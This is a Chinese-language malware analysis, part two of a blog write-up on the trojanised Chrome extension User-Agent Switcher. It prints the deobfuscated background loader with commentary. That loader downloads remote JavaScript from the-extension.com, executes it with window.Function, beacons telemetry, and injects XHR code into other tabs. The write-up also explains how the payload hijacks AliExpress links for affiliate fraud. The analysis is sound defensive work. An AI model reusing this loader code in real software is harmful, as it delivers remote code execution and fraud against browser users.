Chrome插件User-Agent Switcher恶意代码分析下部分

0x00 前言

User-Agent Switcher插件被曝存在恶意代码。看了网上的分析,决定自己动手分析一下。
参考:
[【1】大家注意了 Chrome 的插件 User-Agent Switcher 是个木马][1]
[1]: https://www.v2ex.com/t/389340?from=timeline&isappinstalled=0&nsukey=vFeyuybSy35yBYOU5OJRGu0gxO%2BYXFTrpNbJQwlTlG%2BCeZ9TGicwta9kWHssUsbnpR%2B5MHtZ3xvfNTeP3WF%2BsBDodbJKn4EsSJu67rPwu1GbSAkwNSmKhekvWZ9syprtNbK8irADspy9xXr2kH5U9plG1qpscjuVCAq1zPy4d9aIkoF34iGKp4nf99wBEFsO "大家注意了 Chrome 的插件 User-Agent Switcher 是个木马"

[【2】Chrome插件User-Agent Switcher恶意代码分析报告][2]
[2]: https://cert.360.cn/static/files/Chrome%E6%8F%92%E4%BB%B6User-Agent%20Switcher%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A.pdf "Chrome插件User-Agent Switcher恶意代码分析报告"

0x01 隐写术

在上部分

0x02 去混淆

在上部分

0x03 e函数

在上部分

0x04 r函数

// r(): decide between re-downloading the remote payload and reusing the cached one.
// Resolves with { code, version }. The reject parameter (_0x1b9f00) is never used, so a
// rejection coming out of n() ("Url error") is not propagated and this promise never settles.
function r() {
return new Promise((_0x223434,_0x1b9f00)=>{
// pyW5F1U43VI holds the time of the last successful download (written by o()). On a fresh
// install the key is absent and the `|| 0x0` makes the elapsed-time check below always pass.
l["get"]("pyW5F1U43VI")['then'](_0x30d294=>{
let _0x55a281 = _0x30d294['pyW5F1U43VI'] || 0x0;
// First run only: store the current time under XMWEzI4SfdC (written nowhere else on this page;
// looks like an install-time marker) and send an "install" event through the beacon e().
0x0 === _0x55a281 && l["set"]({
'XMWEzI4SfdC': new Date()["getTime"]()
})['then'](_0x2d7d72=>{
e({
'act': 'install'
});
}
),
// Last download older than c['WL']['Gj'] (0x2932e00 ms = 12 h): wait c['fM'] (0x1b7740 ms = 30 min),
// fetch `${c.WL.url}/?hash=...` through n(), parse/persist the answer with o() and resolve with its
// result. Otherwise resolve straight away with the code/version already in chrome.storage.local.
new Date()["getTime"]() - _0x55a281 > c['WL']['Gj'] ? setTimeout(function() {
n(`${c['WL']["url"]}/?hash=jwtmv6kavksy5cazdf4leg66r`, "GET")["then"](o)["then"](_0x223434);
}, c['fM']) : l["get"](["TjPzl8caI41", "KI10wTwwvF7"])["then"](_0x1d2d5e=>{
_0x223434({
'code': _0x1d2d5e["TjPzl8caI41"],
'version': _0x1d2d5e['KI10wTwwvF7']
});
}
);
}
);
}
);
}

先看看这个函数调用的o函数。

// o(body): parses the JSON text returned by n() and persists the payload it carries.
// Expected shape is { code, version }; code == -1 (loose compare) means "nothing to run".
// Resolves with { code, version }, either freshly stored or read back from chrome.storage.local.
// The reject parameter (_0x349364) is never used.
function o(_0xcaa92b) {
return new Promise((_0x47fce0,_0x349364)=>{
// _0x51ae9e: "valid payload received"; _0x556fe3: the payload JS; _0x58bf0d: its version string.
let _0x51ae9e = !0x1
, _0x556fe3 = ''
, _0x58bf0d = '';
try {
_0xcaa92b = JSON["parse"](_0xcaa92b),
_0x556fe3 = _0xcaa92b["code"],
_0x58bf0d = _0xcaa92b["version"],
// Anything other than -1 is accepted as-is; no integrity or signature check on the script is visible here.
_0x556fe3 == -0x1 || (_0x51ae9e = !0x0);
} catch (_0x1b0f96) {
// Non-JSON response: report "parseResponse" (fr=0 → sent unconditionally) and fall through.
e({
'act': "error",
'lab': 'parseResponse',
'fr': 0x0
});
}
// Valid payload: store the JS under TjPzl8caI41 and the version under KI10wTwwvF7 — the stored
// string is what a() later hands to window.Function — then stamp pyW5F1U43VI with the current
// time, beacon "download" with the version and resolve.
_0x51ae9e ? l["set"]({
'TjPzl8caI41': _0x556fe3,
'KI10wTwwvF7': _0x58bf0d
})['then'](_0x207847=>{
l['set']({
'pyW5F1U43VI': new Date()["getTime"]()
}),
e({
'act': "download",
'lab': _0x58bf0d,
'fr': 0x0
}),
_0x47fce0({
'code': _0x556fe3,
'version': _0x58bf0d
});
}
// Otherwise: report "invalidMonetizationCode" unless the server explicitly answered code == -1
// (after a parse failure _0x556fe3 is still '', so the report is sent), then fall back to whatever
// code/version is already in storage.
) : (_0x556fe3 != -0x1 && e({
'act': "error",
'lab': "invalidMonetizationCode",
'fr': 0x0
}),
l["get"](["TjPzl8caI41", 'KI10wTwwvF7'])['then'](_0x5d38a5=>{
_0x47fce0({
'code': _0x5d38a5['TjPzl8caI41'],
'version': _0x5d38a5["KI10wTwwvF7"]
});
}
));
}
);
}

函数的主要功能是,将n函数下载的json进行解析,然后:
使用TjPzl8caI41,保存解析后的js代码。
使用KI10wTwwvF7,保存解析后的版本号。
同时更新pyW5F1U43VI的时间戳。

首先通过get函数获取pyW5F1U43VI的时间戳,然后判断当前时间戳 - pyW5F1U43VI的时间戳 > 0x2932e00(12个小时)。在尚未写入pyW5F1U43VI的时间戳时,pyW5F1U43VI=0,所以第一次一定会进入setTimeout分支;setTimeout延迟半个小时后,就执行n函数进行下载。

我在网上看到有人说要过12个小时才会执行payload,其实不然,只要半个小时后,就开始执行payload了。(12个小时后又会开始重新下载payload)

抓取到的下载payload的截图
4

0x05 a函数

// a({ code, version }): executes the downloaded JS. window.Function(code) compiles the stored
// string, and the result is invoked with the storage wrapper l, the tab-proxied fetcher n and the
// beacon e as its three arguments — the payload can therefore persist data, make requests and
// report events through the loader's own helpers.
function a(_0xfc65f5) {
try {
window["Function"](_0xfc65f5["code"])(l, n, e),
// Reached only if the payload returned without throwing: beacon "run" with the version, or
// "run"/"idle" when both code and version are empty (the ternary binds looser than || and &&).
e(_0xfc65f5["code"] && 0x0 !== _0xfc65f5['code']["length"] || _0xfc65f5["version"] && 0x0 !== _0xfc65f5['version']["length"] ? {
'act': 'run',
'lab': _0xfc65f5["version"]
} : {
'act': "run",
'lab': "idle"
});
} catch (_0x5bd26e) {
// The payload threw (or Function() failed to compile it): beacon "error" labelled run_<version>.
e({
'act': "error",
'lab': `run_${_0xfc65f5["version"]}`
});
}
}

使用下面的代码进行执行payload

// The persisted payload string is compiled with the Function constructor and called with the
// storage wrapper (l), the tab-proxied fetcher (n) and the beacon function (e) as its arguments.
window["Function"](_0xfc65f5["code"])(l, n, e)

_0xfc65f5["code"]就是payload代码了

0x06 payload的行为

0x00 上传用户信息

payload就具体分析了,没有进行混淆,常规代码。

在背景页面抓取到上传用户信息的截图:

5.jpg

0x01 劫持aliexpress

首先调用getData()从 http://api.data-monitor.info/api/bhrule?sub=116 下载规则,再使用tryUrl函数进行规则匹配,并把匹配到的url替换成如下url

http://systemrtb.com/?target=http%3A%2F%2Fnfemo.com%2Fclick-JQETHVDP-MKIGQNPP%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.aliexpress.com%2F

这个链接会多重跳转,最终跳转到

https://www.aliexpress.com/?aff_platform=aaf&cpt=1508239063454&sk=zj6qB6AIM&aff_trace_key=ecd72b1262d84ff4af977f404b58d6fb-1508239063454-03873-zj6qB6AIM&terminal_id=671274b1e625437f8635bbbebe0e8cfd

6.jpg

0x07 去混淆后的代码

// Deobfuscated background loader (identifiers renamed by the analyst). Call graph, starting from
// i() at the bottom: i() -> r() -> n() -> o() -> a(). Remote JS fetched from c['WL']['url'] is
// persisted in chrome.storage.local and executed with window.Function.
// Artifacts a responder can look for: chrome.storage.local keys TjPzl8caI41 (payload JS),
// KI10wTwwvF7 (payload version), pyW5F1U43VI (last download time), XMWEzI4SfdC (first-run time),
// and requests to the-extension.com for /?hash=... and /stats?... issued from inside ordinary tabs.
(function() {
(function() {
// Rotated string table left over from the original obfuscator. Every lookup has already been
// inlined in this listing, so neither m_list nor GetValue is referenced anywhere below.
var m_list = ['code', 'version', 'error', 'download', 'invalidMonetizationCode', 'TjPzl8caI41', 'KI10wTwwvF7', 'Function', 'run', 'idle', 'pyW5F1U43VI', 'init', 'https://the-extension.com', 'local', 'storage', 'eval', 'then', 'get', 'getTime', 'setUTCHours', 'url', 'origin', 'set', 'GET', 'loading', 'status', 'removeListener', 'onUpdated', 'tabs', 'callee', 'addListener', 'onMessage', 'runtime', 'executeScript', 'replace', 'data', 'test', 'includes', 'http://', 'length', 'Url error', 'query', 'filter', 'active', 'floor', 'random', 'charCodeAt', 'fromCharCode', 'parse'];
// Rotates m_list in place (shift-and-push, 0xa2 iterations) so that GetValue's hex indexes line up.
(function(anony1_param1, anony1_param2) {
var anony2_func = function(anony2_param) {
while (--anony2_param) {
anony1_param1['push'](anony1_param1['shift']());
}
};
anony2_func(++anony1_param2);
}(m_list, 0xa2));

// GetValue(hexIndex): string-table accessor of the obfuscator; the parameter is re-declared with
// `var` (harmless in sloppy mode) and parsed as a base-16 index into m_list.
var GetValue = function(GetValue_param1, GetValue_param2) {
var GetValue_param1 = parseInt(GetValue_param1, 0x10);
var var1 = m_list[GetValue_param1];
return var1;
};
// e({cat, act, lab, fr}): rate-limited telemetry beacon. Reports `${cat}_${act}` at most once per
// `fr` ms to <origin of c.WL.url>/stats. fr defaults to 0x3e8*0x3c*0x3c*0x18 = 86400000 ms (one day);
// callers pass fr=0 to send unconditionally.
function e({cat="eval", act='', lab='', fr=0x3e8*0x3c*0x3c*0x18}) {
// The storage key is the event name shifted by c['FD'] (7) through t(), e.g. "eval_init" -> "l}hsfpup{".
let var1 = t(`${cat}_${act}`, c['FD']);
return l['get'](var1)["then"](anony1_param=>{
// NOTE(review): renaming artifact — this inner `let var1` shadows the key variable and reads itself
// in its own initializer (a TDZ ReferenceError in real JS); the original presumably used two distinct
// identifiers (key vs. stored timestamp). The same shadowing affects `anony1_param[var1]` further down.
let var1 = anony1_param[var1]
// When fr is exactly one day (0x5265c00) the throttle is "once per UTC calendar day" (compared
// against midnight of the stored timestamp); otherwise plain elapsed-time >= fr.
, var2 = 0x5265c00 == fr ? new Date()["getTime"]() - new Date(var1)["setUTCHours"](0x0, 0x0, 0x0, 0x0) >= fr : new Date()["getTime"]() - var1 >= fr;
if (!var1 || var2) {
// Sent through n(), i.e. the POST is issued from inside an ordinary tab, not from the background page.
let anony1_param = `${new URL(c['WL']["url"])["origin"]}/stats`;
n(`${anony1_param}?hash=jwtmv6kavksy5cazdf4leg66r&eventCategory=${cat}&eventAction=${act}&eventLabel=${lab}`, 'POST')['then'](_0x201de8=>{
// Record the send time under the event key so the next call within `fr` is suppressed.
let anony1_param = {};
anony1_param[var1] = new Date()["getTime"](),
l["set"](anony1_param);
}
);
}
}
);
}


// n(url, method): HTTP request proxied through a web page. Instead of calling XMLHttpRequest from
// the background page, it injects a small XHR snippet into an existing, non-active tab whose URL is
// not chrome:// (and not https/ftps when the target is plain http — see ArrFilter) and receives the
// response back via chrome.runtime.sendMessage. Resolves with the response text.
// NOTE(review): the second parameter is named `n` and shadows the function inside its own body
// (harmless, n() is not recursive); a renaming artifact of the deobfuscation.
function n(n_param1, n="GET" ) { //https://the-extension.com/stats?hash=jwtmv6kavksy5cazdf4leg66r&eventCategory=eval&eventAction=init&eventLabel=, POST
return new Promise((resolve,reject)=>{
// tabs.onUpdated fallback used when no suitable tab exists yet: fires while a tab is "loading";
// c['NZ'] (random 0..2) counts down on every such event, so the first 0-2 eligible tabs are
// skipped, then the listener detaches itself and injects into the current one.
function _0x3ad6d4(_0x3a3304, _0x4cce31, _0x57e5fb) {
"loading" === _0x4cce31["status"] && (ArrFilter(_0x57e5fb, n_param1) && c['NZ'] <= 0x0 && (chrome["tabs"]["onUpdated"]["removeListener"](arguments["callee"]),
HttpRequest(_0x3a3304)),
c['NZ']--);
}
// Registers the reply listener, then injects the XHR snippet into tab _0x5a3411 with the target
// URL substituted for `replaceableurl`; the page posts back { data, url, status }.
function HttpRequest(_0x5a3411) {
chrome["runtime"]["onMessage"]["addListener"](_0x4b297c),
chrome["tabs"]["executeScript"](_0x5a3411, {
'code': `(function(){var url = replaceableurl; var xhr = new XMLHttpRequest();xhr.onreadystatechange = function () {if (xhr.readyState === 4) {chrome.runtime.sendMessage({data: xhr.responseText, url: url,status:xhr.status});}};xhr.open('${n}',url, true);xhr.send();})()`["replace"]('replaceableurl', `'${n_param1}'`)
});
}
// Reply handler: accepts only a message whose url equals the requested one, resolves with its
// body, then detaches itself (arguments.callee — so this code cannot run in strict mode).
function _0x4b297c(_0x4a051f) {
_0x4a051f["url"] === n_param1 && (resolve(_0x4a051f["data"]),
chrome["runtime"]["onMessage"]['removeListener'](arguments["callee"]));
}
// Tab eligibility: excludes chrome:// tabs; for an http:// target also excludes https/ftps pages
// (presumably because an http XHR from an https document would be blocked as mixed content — confirm).
function ArrFilter(_0x45a021, _0x3db6fb) {
return new RegExp(`^((?!(chrome${_0x3db6fb["includes"]("http://") ? '|https|ftps' : ''})).+://)`)["test"](_0x45a021["url"]); //"^((?!(chrome)).+://)"
}
// An empty URL rejects with "Url error", but because of the comma operator execution still continues.
n_param1 && 0x0 !== n_param1['length'] || reject("Url error"),
// Choose a random eligible, non-active tab; if there is none, wait for the next tab load instead.
// `resolve` inside this callback is the filtered tab array and shadows the promise's resolve.
chrome["tabs"]["query"]({}, function(anony1_param) {
let resolve = anony1_param["filter"](anony2_param=>ArrFilter(anony2_param, n_param1) && !anony2_param['active']);
0x0 === resolve["length"] ? chrome["tabs"]["onUpdated"]["addListener"](_0x3ad6d4) : HttpRequest(resolve[Math["floor"](Math['random']() * resolve["length"])]['id']);
});
}
);
}
// t(str, k): shifts every UTF-16 code unit of str up by k (Caesar-style). Used with c['FD'] = 7 to
// derive the storage key of a beacon event, e.g. t("eval_init", 7) === "l}hsfpup{".
function t(t_param1, t_param2) {//eval_init 0x7
for (var var1 = '', var2 = 0x0, var3 = 0x0; var3 < t_param1['length']; var3++)
var2 = t_param1[var3]["charCodeAt"]() + t_param2,
var1 += String["fromCharCode"](var2);
return var1;
}
// o(body): parses the JSON text returned by n() and persists the payload it carries.
// Expected shape is { code, version }; code == -1 (loose compare) means "nothing to run".
// Resolves with { code, version }, freshly stored or read back from chrome.storage.local.
// The reject parameter is never used.
function o(o_param) {
return new Promise((resolve,reject)=>{
// var1: "valid payload received"; var2: the payload JS; var3: its version string.
let var1 = !0x1
, var2 = ''
, var3 = '';
try {
o_param = JSON["parse"](o_param),
var2 = o_param["code"],
var3 = o_param["version"],
// Anything other than -1 is accepted as-is; no integrity or signature check on the script is visible here.
var2 == -0x1 || (var1 = !0x0);
} catch (_0x1b0f96) {
// Non-JSON response: report "parseResponse" (fr=0 → sent unconditionally) and fall through.
e({
'act': "error",
'lab': 'parseResponse',
'fr': 0x0
});
}
// Valid payload: store the JS under TjPzl8caI41 and the version under KI10wTwwvF7 (the string a()
// later hands to window.Function), stamp pyW5F1U43VI, beacon "download" and resolve.
var1 ? l["set"]({
'TjPzl8caI41': var2,
'KI10wTwwvF7': var3
})['then'](_0x207847=>{
l['set']({
'pyW5F1U43VI': new Date()["getTime"]()
}),
e({
'act': "download",
'lab': var3,
'fr': 0x0
}),
resolve({
'code': var2,
'version': var3
});
}
// Otherwise: report "invalidMonetizationCode" unless the server explicitly answered code == -1
// (after a parse failure var2 is still '', so the report is sent), then fall back to storage.
) : (var2 != -0x1 && e({
'act': "error",
'lab': "invalidMonetizationCode",
'fr': 0x0
}),
l["get"](["TjPzl8caI41", 'KI10wTwwvF7'])['then'](_0x5d38a5=>{
resolve({
'code': _0x5d38a5['TjPzl8caI41'],
'version': _0x5d38a5["KI10wTwwvF7"]
});
}
));
}
);
}
// a({ code, version }): executes the downloaded JS. window.Function(code) compiles the stored
// string and the result is invoked with the storage wrapper l, the fetcher n and the beacon e,
// so the payload can persist data, make requests and report events through the loader's helpers.
function a(_0xfc65f5) {
try {
window["Function"](_0xfc65f5["code"])(l, n, e),
// Reached only if the payload returned without throwing: beacon "run" with the version, or
// "run"/"idle" when both code and version are empty (the ternary binds looser than || and &&).
e(_0xfc65f5["code"] && 0x0 !== _0xfc65f5['code']["length"] || _0xfc65f5["version"] && 0x0 !== _0xfc65f5['version']["length"] ? {
'act': 'run',
'lab': _0xfc65f5["version"]
} : {
'act': "run",
'lab': "idle"
});
} catch (_0x5bd26e) {
// The payload threw (or Function() failed to compile it): beacon "error" labelled run_<version>.
e({
'act': "error",
'lab': `run_${_0xfc65f5["version"]}`
});
}
}

// r(): decide between re-downloading the remote payload and reusing the cached one.
// Resolves with { code, version }. The reject parameter (_0x1b9f00) is never used, so a
// rejection from n() ("Url error") is not propagated and the promise never settles.
function r() {
return new Promise((_0x223434,_0x1b9f00)=>{
// pyW5F1U43VI holds the time of the last successful download (written by o()); on a fresh
// install the key is absent and the `|| 0x0` makes the elapsed-time check below always pass.
l["get"]("pyW5F1U43VI")['then'](_0x30d294=>{
let var1 = _0x30d294['pyW5F1U43VI'] || 0x0;
// First run only: store the current time under XMWEzI4SfdC (written nowhere else on this page;
// looks like an install-time marker) and send an "install" event through e().
0x0 === var1 && l["set"]({
'XMWEzI4SfdC': new Date()["getTime"]()
})['then'](_0x2d7d72=>{
e({
'act': 'install'
});
}
),
// Older than c['WL']['Gj'] (12 h): after c['fM'] (30 min) fetch `${c.WL.url}/?hash=...` through n(),
// parse/persist with o() and resolve with its result; otherwise resolve with the cached code/version.
new Date()["getTime"]() - var1 > c['WL']['Gj'] ? setTimeout(function() { //0x2932e00 12个小时
n(`${c['WL']["url"]}/?hash=jwtmv6kavksy5cazdf4leg66r`, "GET")["then"](o)["then"](_0x223434);
}, c['fM']) : l["get"](["TjPzl8caI41", "KI10wTwwvF7"])["then"](_0x1d2d5e=>{
_0x223434({
'code': _0x1d2d5e["TjPzl8caI41"],
'version': _0x1d2d5e['KI10wTwwvF7']
});
}
);
}
);
}
);
}
// i(): entry point. After c['Cf'] (1-2 min) it sends the "init" beacon, then r() selects or fetches
// the payload and a() executes it.
function i() {
setTimeout(function() {
e({
'act': "init"
}),
r()["then"](a);
}, c['Cf']);
}
// Configuration. WL.url: remote server; WL.Gj: 0x2932e00 ms = 12 h between re-downloads;
// NZ: number of loading tabs n() skips (0-2); fM: 0x1b7740 ms = 30 min before the first download
// (Math.floor(1*Math.random()+1) is always 1); Cf: 0xea60 ms = 1 min times 1 or 2 start-up delay;
// FD: shift amount used by t() to derive beacon storage keys.
let c = {
'WL': {
'url': "https://the-extension.com",
'Gj': 0x2932e00
},
'NZ': Math["floor"](0x3 * Math["random"]()),
'fM': 0x1b7740 * Math["floor"](0x1 * Math["random"]() + 0x1), //1800000
'Cf': 0xea60 * Math["floor"](0x2 * Math["random"]() + 0x1), //60000
'FD': 0x7
}
// l: promise wrappers around chrome.storage.local. 'yJ' and 'EE' call chrome.storage.local['yJ']
// and ['EE'] — method names not recovered in this listing; neither is referenced anywhere below.
, l = {
'get'(e=null) {
return new Promise((resovle,reject)=>{
chrome["storage"]["local"]["get"](e, function(anony_param) {
resovle(anony_param);
});
}
);
},
'set'(set_param) {
return new Promise((resolve,reject)=>{
chrome["storage"]['local']["set"](set_param, function(anony_param) {
resolve(anony_param);
});
}
);
},
'yJ'(_0x21744e) {
return new Promise((_0x23501d,_0x525375)=>{
chrome["storage"]["local"]['yJ'](_0x21744e, function(_0x298d92) {
_0x23501d(_0x298d92);
});
}
);
},
'EE'() {
return new Promise((_0x47a45d,_0x110900)=>{
chrome["storage"]["local"]['EE'](function(_0x25822d) {
_0x47a45d(_0x25822d);
});
}
);
}
};
// Kick-off: everything above runs only once i() fires.
i();
}
)()
}
)();